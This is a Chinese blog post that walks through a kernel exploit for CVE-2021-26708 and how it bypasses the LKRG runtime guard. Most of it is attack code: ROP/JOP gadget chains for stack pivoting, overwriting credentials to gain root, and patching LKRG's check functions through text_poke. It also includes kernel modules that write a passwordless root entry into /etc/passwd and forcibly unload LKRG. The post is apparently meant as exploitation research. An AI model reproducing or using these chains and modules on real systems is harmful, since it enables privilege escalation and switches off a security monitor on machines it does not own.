【Exploit trick】利用CVE-2021-26708 绕过LKRG缓解机制

已于 2022-07-17 10:45:49 修改
阅读量614 收藏 1
点赞数
分类专栏: 内核漏洞 漏洞 linux 文章标签: linux c语言
于 2021-10-18 09:21:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/panhewu9919/article/details/120820113
版权
内核漏洞 同时被 3 个专栏收录
38 篇文章 10 订阅
订阅专栏
漏洞
18 篇文章 0 订阅
订阅专栏
linux
6 篇文章 0 订阅
订阅专栏

文章目录

LKRG source code

绕过LKRG总结:构造ROP链给两个函数打patch,p_check_integrity()(负责检查内核完整性)和p_cmp_creds()(负责检查进程凭证)。补丁程序为0x48 0x31 0xc0 0xc3,也就是xor rax, rax ; retreturn 0,打完补丁后提权即可。打补丁函数采用void *text_poke(void *addr, const void *opcode, size_t len),kprobes中也用到了该函数。

1. 回顾CVE-2021-26708利用

利用UAF 4字节写漏洞来修改msg_msg->security,构造更一般的UAF;最后伪造skb_shared_info.destructor_arg回调函数来劫持控制流,构造任意写。

void (*callback)(struct ubuf_info *, bool zerocopy_success);

当内核调用skb_zcopy_clear()时,RDI指向ubuf_info结构(用户可控,前8字节为待伪造的回调函数地址),RSI为1。

// [1] 完美gadget,直接劫持栈,但找不到
mov rsp, qword ptr [rdi + 8] ; ret
// [2] vmlinuz-5.10.11-200.fc33.x86_64 中找到如下gadget
mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rdx + rcx*8], rsi ; ret

缺点:利用gadget [2] 可以向uid / gid / effective uid / effective gid 写0 提权,但是缺点是需要2次劫持控制流,降低了exp的稳定性。没有充分利用ROP的优势。

2. 可控的寄存器

skb_zcopy_clear()调用destructor_arg回调函数时下断,观察寄存器状态:

$ gdb vmlinux
gdb-peda$ target remote :1234
gdb-peda$ break ./include/linux/skbuff.h:1481

请添加图片描述

寄存器状态

  • RDI / R8ubuf_info指针
  • R9 / RSP:栈指针
  • R12 / R14:堆指针
  • RBP:指向skb_shared_info——sk_buff->head + 0xec0,可控!

3. 尝试JOP

找到很多如下类似的gadge:可以使RSP指向用户空间,然后跳转到可控的地址。

// acpi_idle_lpi_enter()
0xffffffff81711d33 : xchg eax, esp ; jmp qword ptr [rbp + 0x48]

问题:很奇怪,动态运行时,该位置处的代码改变了。

原因acpi_idle_lpi_enter()在运行时被 CONFIG_DYNAMIC_FTRACE 修改了。

解决:在动态运行的代码中搜索ROP/JOP。

# 先确定text地址
[root@localhost ~]# grep "_text" /proc/kallsyms
ffffffff81000000 T _text
[root@localhost ~]# grep "_etext" /proc/kallsyms 
ffffffff81e026d7 T _etext
# dump 内存
gdb-peda$ dumpmem kerndump 0xffffffff81000000 0xffffffff81e03000
Dumped 14692352 bytes to 'kerndump'
# 采用 ROPgadget 搜索 ROP/JOP
$ ./ROPgadget.py --binary kerndump --rawArch=x86 --rawMode=64 > rop_gadgets_5.10.11_kerndump

4. ROP/JOP chain 劫持栈

寻找RBP跳转相关的gadget(RBP可控),来劫持栈。

  • (1)首先保存RSP低32字节,便于最后恢复RSP(没有找到可直接保存RSP的gadget,但可以利用R9来保存高4字节);
  • (2)将RDI——ubuf_info结构地址压栈;
  • (3)RSP指向ubuf_info结构,可控。
/* JOP/ROP gadget chain for stack pivoting: */

/* mov ecx, esp ; cwde ; jmp qword ptr [rbp + 0x48] */
#define STACK_PIVOT_1_MOV_ECX_ESP_JMP		(0xFFFFFFFF81768A43lu + kaslr_offset)

/* push rdi ; jmp qword ptr [rbp - 0x75] */
#define STACK_PIVOT_2_PUSH_RDI_JMP		(0xFFFFFFFF81B5FD0Alu + kaslr_offset)

/* pop rsp ; pop rbx ; ret */
#define STACK_PIVOT_3_POP_RSP_POP_RBX_RET	(0xFFFFFFFF8165E33Flu + kaslr_offset)

/* mov ecx, esp ; cwde ; jmp qword ptr [rbp + 0x48] */
uinfo_p->callback = STACK_PIVOT_1_MOV_ECX_ESP_JMP;

unsigned long *jmp_addr_1 = (unsigned long *)(xattr_addr + SKB_SHINFO_OFFSET + 0x48);
/* push rdi ; jmp qword ptr [rbp - 0x75] */
*jmp_addr_1 = STACK_PIVOT_2_PUSH_RDI_JMP;

unsigned long *jmp_addr_2 = (unsigned long *)(xattr_addr + SKB_SHINFO_OFFSET - 0x75);
/* pop rsp ; pop rbx ; ret */
*jmp_addr_2 = STACK_PIVOT_3_POP_RSP_POP_RBX_RET;

以下是sk_buff堆喷的构造示意图

请添加图片描述

5. ROP提权

提权思路:前文已利用任意读泄露了owner_cred地址,构造ROP修改uid / gid / effective uid / effective gid 为0即可。

unsigned long *rop_gadget = (unsigned long *)(xattr_addr + MY_UINFO_OFFSET + 8);
int i = 0;

#define ROP_POP_RAX_RET			(0xFFFFFFFF81015BF4lu + kaslr_offset)
#define ROP_MOV_QWORD_PTR_RAX_0_RET	(0xFFFFFFFF8112E6D7lu + kaslr_offset)

/* 1. Perform privilege escalation */
rop_gadget[i++] = ROP_POP_RAX_RET;		/* pop rax ; ret */
rop_gadget[i++] = owner_cred + CRED_UID_GID_OFFSET;
rop_gadget[i++] = ROP_MOV_QWORD_PTR_RAX_0_RET;	/* mov qword ptr [rax], 0 ; ret */
rop_gadget[i++] = ROP_POP_RAX_RET;		/* pop rax ; ret */
rop_gadget[i++] = owner_cred + CRED_EUID_EGID_OFFSET;
rop_gadget[i++] = ROP_MOV_QWORD_PTR_RAX_0_RET;	/* mov qword ptr [rax], 0 ; ret */

恢复RSP:需恢复RSP并继续系统调用处理。RCX保存了RSP低32位,R9保存了RSP高32位,可以一同恢复RSP。没有找到mov rsp, rax ; ret gadget,所以需通过RBX间接传递。

#define ROP_MOV_RAX_R9_RET		(0xFFFFFFFF8106BDA4lu + kaslr_offset)
#define ROP_POP_RDX_RET			(0xFFFFFFFF8105ED4Dlu + kaslr_offset)
#define ROP_AND_RAX_RDX_RET		(0xFFFFFFFF8101AD34lu + kaslr_offset)
#define ROP_ADD_RAX_RCX_RET		(0xFFFFFFFF8102BA35lu + kaslr_offset)
#define ROP_PUSH_RAX_POP_RBX_RET	(0xFFFFFFFF810D64D1lu + kaslr_offset)
#define ROP_PUSH_RBX_POP_RSP_RET	(0xFFFFFFFF810749E9lu + kaslr_offset)

/* 2. Restore RSP and continue */
rop_gadget[i++] = ROP_MOV_RAX_R9_RET;	    /* mov rax, r9 ; ret */
rop_gadget[i++] = ROP_POP_RDX_RET;	    /* pop rdx ; ret */
rop_gadget[i++] = 0xffffffff00000000lu;
rop_gadget[i++] = ROP_AND_RAX_RDX_RET;	    /* and rax, rdx ; ret */
rop_gadget[i++] = ROP_ADD_RAX_RCX_RET;	    /* add rax, rcx ; ret */
rop_gadget[i++] = ROP_PUSH_RAX_POP_RBX_RET; /* push rax ; pop rbx ; ret */
rop_gadget[i++] = ROP_PUSH_RBX_POP_RSP_RET; /* push rbx ; add eax, 0x415d0060 ; pop rsp ; ret*/

6. LKRG介绍

LKRG简介:全称Linux Kernel Runtime Guard,是一个在 Linux 内核执行运行时完整性检查的可加载内核模块(LKM),也可以检测正在运行的进程的提权行为,在漏洞利用代码运行之前杀掉这个运行进程。经过测试,安装LKRG v0.8 后大约会产生 2.5% 性能影响,LKRG 能检测到CVE-2014-9322 (BadIRET)、CVE-2017-5123 (waitid(2) missing access_ok)、以及 CVE-2017-6074 (use-after-free in DCCP protocol) 的漏洞利用企图,但是没有检测到 CVE-2016-5195 (Dirty COW) 的漏洞利用企图。

LKRG防御手段:参见LKRG anti-exploit functionality

  • 防止非法提权(EoP)
    • Token / pointer swapping
    • 非法调用commit_creds()函数
    • 覆写struct cred结构
  • 沙盒(eg,Chrome Sandbox中覆写seccomp配置和规则)、命名空间、容器(eg,Doker/Kubernetes)逃逸
  • 非法篡改CPU状态(例如,x86中关闭SMEP / SMAP)
  • 非法修改内核的.text.rodata
  • pCFI(Poor man’s CFI)机制:检查内核栈迁移和ROP,检测非法控制流(非.text节、动态生成的可执行页、用户页、当攻击者绕过SMEP)

例如,可检测到从非代码页调用内核API(CVE-2017-1000112,从伪造的栈上调用内核API),pCFI检测ROP(CVE-2017-1000112,错误的栈基址、错误的栈指针),检测进程的UID发生变化(0->1000)

LKRG绕过思路

  • Fly under LKRG’s radar:

    • Overwrite critical metadata not guarded by LKRG
    • Try to win races
    • Move attack to userspace

  • Attack (disable) LKRG and continue normal work:

    • Try to win races (corrupting LKRG’s database)
    • Attack LKRG’s internal synchronization / locking
    • Find all LKRG’s running contexts and disable them + block a new one

  • Directly attack the userspace via kernel (e.g. DirtyCOW)

LKRG完整性保护

  • Calculate hash from the critical [meta]data – SipHash

  • Guarded regions:

  • Critical (V)CPU/core data – Inter-Processor-Interrupt (IPI) is sent to the individual core in all (V)CPUs to exclusively run LKRG’s guard function (IDT/MSR/CRx/etc.)

    • LKRG keeps information about how many (V)CPU/cores are „online” / „offline” / „possible”

  • Entire Linux kernel .text section

    • This covers almost entire Linux kernel itself, like syscall tables, all procedures, all function, all IRQ handlers, etc.

  • Entire Linux kernel .rodata section

  • Entire Linux kernel exception table

  • Critical global system variables, like:

    • selinux_enabled
    • selinux_enforcing / selinux_state
    • Supervisor Mode Execution Protection (SMEP) and Supervisor Mode Access Prevention (SMAP)
    • CR4.WP

  • All dynamically loaded modules AND their order in the internal structures

  • Optionally,it is possible to enable guard of the entire IOMMU table

现有的绕过方法Ilya Matveychikov尝试过各种方法来绕过LKRG,但 Adam ‘pi3’ Zabrocki 对LKRG进行了加固—— improved LKRG

  • (1)利用call_usermodehelper和chmod+chown`来修改 shell binary 的权限;
  • (2)利用simple_setattr()覆盖inode->i_{uid,gid,mode}来修改 shell binary 的权限;
  • (3)直接覆盖inode->i_{uid,gid,mode},修改 shell binary 的 inode(file) 特性,使之属于root;
  • (4)LKRG 0.6 引入了基于软件的CFI(pCFI),遍历调用栈,检查栈上地址是否超出 kernel text范围。绕过方法是,先保存栈内容,替换栈上返回地址指向kernel text有效地址,然后提权(调用schedule_on_each_cpu()推迟提权,调用module_alloc()来分配可执行可写内存,存放提权的shellcode),再恢复栈内容;
  • (5)all_usermodehelper (ld_preload)LKRG 6.0 的白名单中;绕过UMH locking by using whitelist of programs机制,可以向/sbin/modprobe插入payload。
  • (6)关闭kprobes
  • (7)修改/etc/shadow

尝试1——改/etc/passwd:由于LKRG没有追踪/etc/passwd的访问,可通过修改root密码再执行su来绕过LKRG。

写如下内核模块进行测试,修改/etc/passwdroot::0:0:root:/root:/bin/bash\n。作者在ROP链中执行filp_open()kernel_write(),但是打开/etc/passwd 时失败了,可能是在内核打开文件时检查了进程凭证和SELinux metadata,在调用filp_open()之前覆写这些数据也不行,因为LKRG会追踪并杀死该进程。

#include <linux/module.h>
#include <linux/kallsyms.h>

static int __init pwdhack_init(void)
{
	struct file *f = NULL;
	char *str = "root::0:0:root:/root:/bin/bash\n";
	ssize_t wret;
	loff_t pos = 0;

	pr_notice("pwdhack: init\n");

	f = filp_open("/etc/passwd", O_WRONLY, 0);
	if (IS_ERR(f)) {
		pr_err("pwdhack: filp_open() failed\n");
		return -ENOENT;
	}

	wret = kernel_write(f, str, strlen(str), &pos);
	printk("pwdhack: kernel_write() returned %ld\n", wret);

	pr_notice("pwdhack: done\n");

	return 0;
}

static void __exit pwdhack_exit(void)
{
	pr_notice("pwdhack: exit\n");
}

module_init(pwdhack_init)
module_exit(pwdhack_exit)

MODULE_LICENSE("GPL v2");

尝试2——卸载LKRG:先采用如下模块进行测试,成功卸载。作者在ROP中调用find_module()LKRG exit(),但是失败了,在执行p_lkrg_deregister()过程中,LKRG调用了schedule()内核函数来进行pCFI检查,检测到栈迁移的行为并杀死了exp进程。

#include <linux/module.h>
#include <linux/kallsyms.h>

static int __init destroy_lkrg_init(void)
{
	struct module *lkrg_mod = find_module("p_lkrg");

	if (!lkrg_mod) {
		pr_notice("destroy_lkrg: p_lkrg module is NOT found\n");
		return -ENOENT;
	}

	if (!lkrg_mod->exit) {
		pr_notice("destroy_lkrg: p_lkrg module has no exit method\n");
		return -ENOENT;
	}

	pr_notice("destroy_lkrg: p_lkrg module is found, remove it brutally!\n");
	lkrg_mod->exit();

	return 0;
}

static void __exit destroy_lkrg_exit(void)
{
	pr_notice("destroy_lkrg: exit\n");
}

module_init(destroy_lkrg_init)
module_exit(destroy_lkrg_exit)

MODULE_LICENSE("GPL v2");

尝试3——禁用kprobes:LKRG会采用kprobeskretprobes来安插 checking hooks。首先尝试用debugfs接口执行命令echo 0 > /sys/kernel/debug/kprobes/enabled来禁用kprobes,但是发现内核似乎陷入了死锁。调试LKRG也很困难,只要用gdb下断点,就会改变内核代码,LKRG的并行线程会检测到内核完整性被破坏,内核会意外崩溃,无法弄清内核发生了什么。

7. 成功绕过LKRG

绕过LKRG思路:构造ROP链给两个函数打patch,p_check_integrity()(负责检查内核完整性)和p_cmp_creds()(负责检查进程凭证)。补丁程序为0x48 0x31 0xc0 0xc3,也就是xor rax, rax ; retreturn 0,打完补丁后提权即可。

unsigned long *rop_gadget = (unsigned long *)(xattr_addr + MY_UINFO_OFFSET + 8);
int i = 0;

#define SAVED_RSP_OFFSET	3400

#define ROP_MOV_RAX_R9_RET		(0xFFFFFFFF8106BDA4lu + kaslr_offset)
#define ROP_POP_RDX_RET			(0xFFFFFFFF8105ED4Dlu + kaslr_offset)
#define ROP_AND_RAX_RDX_RET		(0xFFFFFFFF8101AD34lu + kaslr_offset)
#define ROP_ADD_RAX_RCX_RET		(0xFFFFFFFF8102BA35lu + kaslr_offset)
#define ROP_MOV_RDX_RAX_RET		(0xFFFFFFFF81999A1Dlu + kaslr_offset)
#define ROP_POP_RAX_RET			(0xFFFFFFFF81015BF4lu + kaslr_offset)
#define ROP_MOV_QWORD_PTR_RAX_RDX_RET	(0xFFFFFFFF81B6CB17lu + kaslr_offset)

/* 1. Save RSP */
rop_gadget[i++] = ROP_MOV_RAX_R9_RET;	/* mov rax, r9 ; ret */
rop_gadget[i++] = ROP_POP_RDX_RET;	/* pop rdx ; ret */
rop_gadget[i++] = 0xffffffff00000000lu;
rop_gadget[i++] = ROP_AND_RAX_RDX_RET;	/* and rax, rdx ; ret */
rop_gadget[i++] = ROP_ADD_RAX_RCX_RET;	/* add rax, rcx ; ret */
rop_gadget[i++] = ROP_MOV_RDX_RAX_RET;	/* mov rdx, rax ; shr rax, 0x20 ; xor eax, edx ; ret */
rop_gadget[i++] = ROP_POP_RAX_RET;	/* pop rax ; ret */
rop_gadget[i++] = uaf_write_value + SAVED_RSP_OFFSET;
rop_gadget[i++] = ROP_MOV_QWORD_PTR_RAX_RDX_RET; /* mov qword ptr [rax], rdx ; ret */

保存RSP:根据ECXR9来重构RSP,并保存到sk_buff区域——SAVED_RSP_OFFSET

#define KALLSYMS_LOOKUP_NAME 	(0xffffffff81183dc0lu + kaslr_offset)
#define FUNCNAME_OFFSET_1	3550

#define ROP_POP_RDI_RET				(0xFFFFFFFF81004652lu + kaslr_offset)
#define ROP_JMP_RAX				(0xFFFFFFFF81000087lu + kaslr_offset)

/* 2. Destroy lkrg : part 1 */
rop_gadget[i++] = ROP_POP_RAX_RET;	/* pop rax ; ret */
rop_gadget[i++] = KALLSYMS_LOOKUP_NAME;
		  /* unsigned long kallsyms_lookup_name(const char *name) */
rop_gadget[i++] = ROP_POP_RDI_RET;	/* pop rdi ; ret */
rop_gadget[i++] = uaf_write_value + FUNCNAME_OFFSET_1;
strncpy((char *)xattr_addr + FUNCNAME_OFFSET_1, "p_cmp_creds", 12);
rop_gadget[i++] = ROP_JMP_RAX;		/* jmp rax */

搜索p_cmp_creds()地址:ROP链调用kallsyms_lookup_name("p_cmp_creds")来查找p_cmp_creds() 函数地址,在sk_buffFUNCNAME_OFFSET_1 偏移处保存"p_cmp_creds"字符串。lkrg.hide配置选项默认为0,所以攻击者可以调用kallsyms_lookup_name()找到LKRG函数,也有其他方法来找到这些函数的地址。

#define XOR_RAX_RAX_RET				(0xFFFFFFFF810859C0lu + kaslr_offset)
#define ROP_TEST_RAX_RAX_CMOVE_RAX_RDX_RET	(0xFFFFFFFF81196AA2lu + kaslr_offset)

/* If lkrg function is not found, let's patch "xor rax, rax ; ret" */
rop_gadget[i++] = ROP_POP_RDX_RET;	/* pop rdx ; ret */
rop_gadget[i++] = XOR_RAX_RAX_RET;
rop_gadget[i++] = ROP_TEST_RAX_RAX_CMOVE_RAX_RDX_RET; /* test rax, rax ; cmove rax, rdx ; ret*/

kallsyms_lookup_name()函数返回RAX就是p_cmp_creds()的地址,如果kallsyms_lookup_name()返回NULL,则表示LKRG没有加载。为了处理这两种情况,作者采用了这种构造技巧:

  • (1)找到gadget xor rax, rax ; ret,记为XOR_RAX_RAX_RET
  • (2)将XOR_RAX_RAX_RET载入RDX
  • (3)如果kallsyms_lookup_name("p_cmp_creds")返回NULL,则将返回值RAX置为XOR_RAX_RAX_RET,采用gadget test rax, rax ; cmove rax, rdx ; ret 中的条件mov指令(cmove)完成。

如果加载了LKRG,则将p_cmp_creds()打补丁为xor rax, rax ; ret;相反,如果没加载LKRG,则将xor rax, rax ; ret打补丁为一样的内容,避免内核崩溃。

#define TEXT_POKE		(0xffffffff81031300lu + kaslr_offset)
#define CODE_PATCH_OFFSET	3450

#define ROP_MOV_RDI_RAX_POP_RBX_RET		(0xFFFFFFFF81020ABDlu + kaslr_offset)
#define ROP_POP_RSI_RET				(0xFFFFFFFF810006A4lu + kaslr_offset)

rop_gadget[i++] = ROP_MOV_RDI_RAX_POP_RBX_RET;
		  /* mov rdi, rax ; mov eax, ebx ; pop rbx ; or rax, rdi ; ret */
rop_gadget[i++] = 0x1337;	   /* dummy value for RBX */
rop_gadget[i++] = ROP_POP_RSI_RET; /* pop rsi ; ret */
rop_gadget[i++] = uaf_write_value + CODE_PATCH_OFFSET;
strncpy((char *)xattr_addr + CODE_PATCH_OFFSET, "\x48\x31\xc0\xc3", 5);
rop_gadget[i++] = ROP_POP_RDX_RET; /* pop rdx ; ret */
rop_gadget[i++] = 4;
rop_gadget[i++] = ROP_POP_RAX_RET; /* pop rax ; ret */
rop_gadget[i++] = TEXT_POKE;
		  /* void *text_poke(void *addr, const void *opcode, size_t len) */
rop_gadget[i++] = ROP_JMP_RAX;	   /* jmp rax */

打补丁:准备参数并调用text_poke()来打补丁。

  • (1)将p_cmp_creds()地址,也即RAX传给RDI
  • (2)补丁值的地址传给RSI,补丁值放在sk_buffCODE_PATCH_OFFSET偏移处,值为0x48 0x31 0xc0 0xc3
  • (3)补丁值的长度4传给RDX

text_poke() 也被用在kprobes和其他内核机制中,可以更新内核指令(重新映射代码页并调用memcpy())。

接着采用相同的步骤来给p_check_integrity()打补丁。

#define ROP_MOV_QWORD_PTR_RAX_0_RET	(0xFFFFFFFF8112E6D7lu + kaslr_offset)

/* 3. Perform privilege escalation */
rop_gadget[i++] = ROP_POP_RAX_RET;		/* pop rax ; ret */
rop_gadget[i++] = owner_cred + CRED_UID_GID_OFFSET;
rop_gadget[i++] = ROP_MOV_QWORD_PTR_RAX_0_RET;	/* mov qword ptr [rax], 0 ; ret */
rop_gadget[i++] = ROP_POP_RAX_RET;		/* pop rax ; ret */
rop_gadget[i++] = owner_cred + CRED_EUID_EGID_OFFSET;
rop_gadget[i++] = ROP_MOV_QWORD_PTR_RAX_0_RET;	/* mov qword ptr [rax], 0 ; ret */

/* 4. Restore RSP and continue */
rop_gadget[i++] = ROP_POP_RAX_RET;		 /* pop rax ; ret */
rop_gadget[i++] = uaf_write_value + SAVED_RSP_OFFSET;
rop_gadget[i++] = ROP_MOV_RAX_QWORD_PTR_RAX_RET; /* mov rax, qword ptr [rax] ; ret */
rop_gadget[i++] = ROP_PUSH_RAX_POP_RBX_RET;	 /* push rax ; pop rbx ; ret */
rop_gadget[i++] = ROP_PUSH_RBX_POP_RSP_RET;
		  /* push rbx ; add eax, 0x415d0060 ; pop rsp ; ret */

提权并恢复RSP:提权过后,recv()系统调用后就有了root权限。

8. 结论与思考

本攻击方法还没有出对应的防护措施。如果LKRG被移植到hypervisor(例如QEMU/KVM)或ARM可信执行环境的FOSS实现(例如OPEN-TEE),漏洞利用难度将会增大。

参考

Improving the exploit for CVE-2021-26708 in the Linux kernel to bypass LKRG

LKRG:用于运行时完整性检查的可加载内核模块

bsauce
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vsock_poc:调查CVE-2021-26708背后的错误
05-21
vsock_poc 调查CVE-2021-26708背后的错误 此存储库包含有关CVE-2021-26708的小文章,以及如何将该错误转变为“免费使用后写入”原语。 这里的PoC并不是一个完整的漏洞利用工具,只是我尝试调查此错误时使用的工具。 释放后,它可以成功使用kmalloc-64高速缓存中的条目,但是没有任何代码可以修饰内存并将感兴趣的东西放入插槽。 这是报告的一个有趣的错误。 它之所以引起我的注意,是因为补丁是如此简单,只是阻止了在5个不同位置的锁之外获取对vsk->transport的引用。 下面是从补丁程序到可以用于开发的无用后使用原语的过程的简短演练。 本演练对希望探索此错误的其他人应有所帮助。 环境设定 我下载了Linux内核5.10.13,并手动撤消了上面显示的补丁。 有关构建和运行内核的更多信息,下面是一个很好的参考。 我还修改了引导参数以启用使用kgdb的内
CVE-2021-1732-Exploit:CVE-2021-1732漏洞利用
03-06
在提供的压缩包中,"CVE-2021-1732-Exploit-main"可能是一个示例代码或者利用程序,用于演示如何触发这个漏洞。研究这个文件可以帮助安全专家理解漏洞的工作原理,从而更好地防御和修复。不过,直接运行这样的文件...
[CVE-2021-26708]使用sshd触发Linux内核AF_VSOCK套接字条件竞争漏洞
whoami
03-02 419
一、漏洞背景 Alexander Popov发表了一篇文章Four Bytes of Power: Exploiting CVE-2021-26708 in the Linux kernel,它使用四字节覆盖漏洞进行权限提升。根据披露细节,该漏洞是由于错误加锁导致,可以在低权限下触发并自动加载易受攻击驱动模块创建AF_VSOCK套接字,进而导致本地权限提升。 二、漏洞分析 该漏洞利用分为以下几个步骤: 在可预测的地址分配一个good msg:在 vsock 上进行条件竞争;读取从 /dev/km
linux kernel ping_init_sock poc,Linux 内核 AF_VSOCK 套接字条件竞争漏洞(CVE-2021-26708)分析...
weixin_39852647的博客
05-13 296
一、漏洞背景近期,国外安全研究人员在oss-security上披露了一个AF_VSOCK套接字条件竞争高危漏洞CVE-2021-26708(CNVD-2021-10822、CNNVD-202102-529)。根据披露细节,该漏洞是由于错误加锁导致,可以在低权限下触发并自动加载易受攻击驱动模块创建AF_VSOCK套接字,进而导致本地权限提升。该漏洞补丁已经合并到Linux内核主线中。二、VSOCK介...
linux内核竞争条件漏洞,Linux内核AF_VSOCK套接字条件竞争漏洞(CVE-2021-26708)分析...
weixin_29115367的博客
05-10 516
漏洞背景近期,国外安全研究人员在oss-security上披露了一个AF_VSOCK套接字条件竞争高危漏洞CVE-2021-26708(CNVD-2021-10822、CNNVD-202102-529)。根据披露细节,该漏洞是由于错误加锁导致,可以在低权限下触发并自动加载易受攻击驱动模块创建AF_VSOCK套接字,进而导致本地权限提升。该漏洞补丁已经合并到Linux内核主线中。VSOCK介绍和架构...
CVE-2021-26708 利用四字节释放特定地址,修改内存
inquisiter
09-17 489
看个漏洞吧,挖洞工具还没掌握到精髓。 http://www.hackdig.com/04/hack-339887.htm 漏洞原因 vsock_stream_etssockopt() { struct sock *sk; struct vsock_sock *vsk; const struct vsock_transport *transport; /* ... */ sk = sock->sk; vsk = vsock_sk(sk); trans
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
"laravel-CVE-2021-3129-EXP-main.zip" 包含了利用此漏洞的 EXP(exploit,即利用程序)。攻击者可能会使用以下步骤来利用此漏洞: 1. 构造带有恶意文件名的 HTTP 请求,文件名可能包含类似于 `../` 或 `%00` 这样...
CVE-2021-27928:CVE-2021-27928 MariaDBMySQL-'wsrep provider' 命令注入漏洞
04-16
信息Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_... and the wsrep patch through 2021-03-03 for MySQLTested on: LinuxCVE : CVE-2021-27928如何利用步骤1:建立反向Shell有效负载msfvenom -p linux/x64/shel
laravel-exploits:针对CVE-2021-3129的漏洞利用
05-25
漏洞利用CVE-2021-3129详细信息: ://www.ambionics.io/blog/laravel-debug-rce 用法 $ php -d ' phar.readonly=0 ' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id $ ./...
Proxylogon-exploit:proxylogon漏洞-CVE-2021-26857
03-12
Proxylogon 漏洞,正式称为 CVE-2021-26857,是针对 Microsoft Exchange Server 的一个严重安全漏洞。该漏洞源于 Exchange Server 中的身份验证机制缺陷,允许未经身份验证的远程攻击者在目标服务器上执行任意代码。...
pa_poc_v4
02-24
林业Jekyll演示 Jekyll演示站点。 导入林业 该项目已预先配置为与Forestry一起使用,只需导入您的存储库 :sparkles: 。 您所做的任何更改都将被提交回存储库,并在您使用Netlify时进行部署。 Forestry为编辑者提供了一个可用的界面来编辑Markdown,YAML和JSON文件: 文献资料 部署方式 部署此Jekyll v4演示的最简单方法是通过进行构建和部署,只需单击下面的按钮并按照说明进行操作即可。 在本地运行 要求 Ruby> 2.4 捆绑器> 2.0 杰基尔> 4.0 克隆存储库后: # Install project dependencies bundle install # Run a local server to preview your work bundle exec jekyll serve
CVE-2021-26855
03-12
我已经在为中国读者翻译了中文漏洞利用程序,对于不熟悉golang的人,请看png图片
Linux Kernel运行时安全检测之LKRG-实践篇
Rethinking the Kernel
09-07 1万+
LKRG实践篇---从一个内核Memory Corruption的例子来看LKRG的运行时检测效果。任何一项策略和方案,可以作为系统级别纵深防御策略的其中一道防线,但不是“一招胜天”的灵丹妙药,只有构建多层级防御矩阵,以及多个角度来解析安全问题,才会达到更好的效果。​
linux内核消减kptr,LINUX漏洞缓解机制介绍
weixin_33831334的博客
04-29 535
原标题:LINUX漏洞缓解机制介绍一.应用层安全防护 1.ASLRASLR(Address space layout randomization,地址空间布局随机化)通过随机放置数据区域的地址空间来防止攻击者跳转到内存的特定位置。在windows上ASLR主要包括堆栈随机化、PEB与TEB随机化、映像随机化,windows系统上虽然xp时代就提出来了,但是从vista开始ASLR才真正发挥作用。在...
【转】Linux内核安全技术(一)——开源演进回顾
最新发布
叫好与叫座虽然不是对立面,但想在同一个作品中达到双重效果很难。
06-10 364
如今Android智能设备的安全和隐私保护技术&体验已越来越好,但很多老用户,可能对早年Android手机的各种漏洞、“一键root”工具还有印象。(记得当时买的小米,有个专门的root论坛,时光好快)那位于Android系统底层的Linux内核,在这些年发展中,它的安全特性有哪些变化呢?本文是Linux内核安全技术系列的第一篇,希望通过回顾开源内核安全技术演进过程,回答上述问题。本文回顾2010~2022年开源内核安全技术的发展和演进过程。
Linux Kernel运行时安全检测之LKRG-原理篇
热门推荐
Rethinking the Kernel
09-01 1万+
虽然经常更新内核版本通常被认为是一种安全最佳实践,但由于各种原因,尤其是生产环境中的服务器无法这样操作。这就意味着在机器运行时,会存在利用已知的漏洞(当然,还会有一些未知的漏洞)来进行攻击的情况,所以需要某种方法来检测和阻止对这些漏洞的利用,这正是Linux Kernel Runtime Guard(Linux内核运行时保护LKRG)诞生目的所在。...
这些Linux发行版帮您增强隐私和安全性
u014389734的博客
04-04 254
本文地址:https://www.linuxprobe.com/linux-security-distributed.html 当前社会隐私和安全已成为人们关注重要话题---我们每天都会收到关于黑客攻击、存储和监控敏感信息的安全新闻。 对于我们Linux用户来说, Linux 是一个高度安全的操作系统。虽然所有 Linux“发行版”(或 Linux 软件的分布式版本)在设计上都是安全的,但某些发行版在保护用户隐私和安全方面做得更出色。我们汇总了我们最喜欢的专业安全 Linux 发行版列表。本文...
Linux 安全缓解机制总结
panhewu9919的博客
06-28 5894
学习资料: linux-kernel-defence-map A Decade of Linux Kernel Vulnerabilities, their Mitigation and Open Problems-2017 The State of Kernel Self Protection-2018 PaX/Grsecurity 代码分析——各种安全机制 Linux每个版本对应的安全更新 linux安全机制的论文 防护研究团队: SELinux (NSA)、AppArmor
CVE-2021-1732:Windows本地提权漏洞分析与Exploit开发
"CVE-2021-1732是一个关于Microsoft Windows本地提权漏洞的研究及Exploit开发文档,详细介绍了漏洞的原理、POC(Proof of Concept)开发和Exploit开发过程。该漏洞主要存在于Windows图形驱动win32kfull!...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值